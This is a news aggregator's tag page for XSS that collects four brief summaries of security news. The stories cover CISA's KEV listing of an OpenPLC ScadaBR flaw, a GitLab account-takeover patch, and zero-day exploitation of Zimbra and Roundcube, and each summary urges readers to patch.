tldrdaily.news logo
Tag

Xss

All articles tagged with #xss

cybersecurity1 month ago

CISA Adds OpenPLC ScadaBR XSS Vulnerability to KEV Amid Exploits

CISA has added the actively exploited CVE-2021-26829 XSS vulnerability in OpenPLC ScadaBR to its KEV catalog, highlighting ongoing threats from hacktivist groups like TwoNet, which exploited this flaw in a honeypot to deface a system. The attack involved using default credentials and web application layer exploits, with federal agencies required to patch by December 19, 2025. Additionally, a long-running exploit operation targeting Brazil has been observed, utilizing legitimate cloud infrastructure to evade detection.

via The Hacker News|
#cisa#cve-2021-26829#cybersecurity
cybersecurity1 year ago

GitLab Patches Critical Account Takeover Vulnerability

GitLab has patched a high-severity XSS vulnerability (CVE-2024-4835) in its VS code editor that could allow unauthenticated attackers to take over user accounts. The company urges immediate updates to versions 17.0.1, 16.11.3, and 16.10.6 for both Community and Enterprise Editions. Additionally, six medium-severity flaws were also addressed, including a CSRF vulnerability and a denial-of-service bug. GitLab accounts are high-value targets due to the sensitive data they host, and previous vulnerabilities have been actively exploited.

via BleepingComputer|
#cve-2024-4835#cybersecurity#gitlab
cybersecurity2 years ago

Global Governments Targeted in Massive Zimbra Zero-Day Hacking Spree

Google's Threat Analysis Group (TAG) has discovered that hackers exploited a zero-day vulnerability in Zimbra Collaboration email server, known as CVE-2023-37580, to steal sensitive data from government systems in multiple countries. The vulnerability, an XSS issue in the Zimbra Classic Web Client, was exploited by four distinct threat actors before the vendor released a patch. The attacks involved email data exfiltration, auto-forwarding, and phishing. Google's report highlights the importance of timely security updates, even for medium-severity vulnerabilities, as adversaries can exploit them to further their attacks. This incident is another example of XSS flaws being leveraged to target mail servers.

via BleepingComputer|
#cybersecurity#google#government-organizations
cybersecurity2 years ago

"Massive Cyber Espionage Campaign Targets European Governments with Webmail Zero-Day Exploit"

Pro-Russia hackers known as Winter Vivern have been exploiting a zero-day vulnerability in Roundcube, a widely used webmail software, to target governmental entities and a think tank in Europe. The vulnerability allowed the hackers to inject JavaScript into the Roundcube server application, triggering the server to send emails from selected targets to a server controlled by the threat actor. The attacks began on October 11 and were detected by security firm ESET, who promptly reported the vulnerability to Roundcube developers. Winter Vivern has previously targeted US government officials and has been active since at least 2020, primarily focusing on Europe and Central Asia. Users of Roundcube are advised to ensure they are running a patched version of the software.

via Ars Technica|
#cybersecurity#pro-russia-hackers#roundcube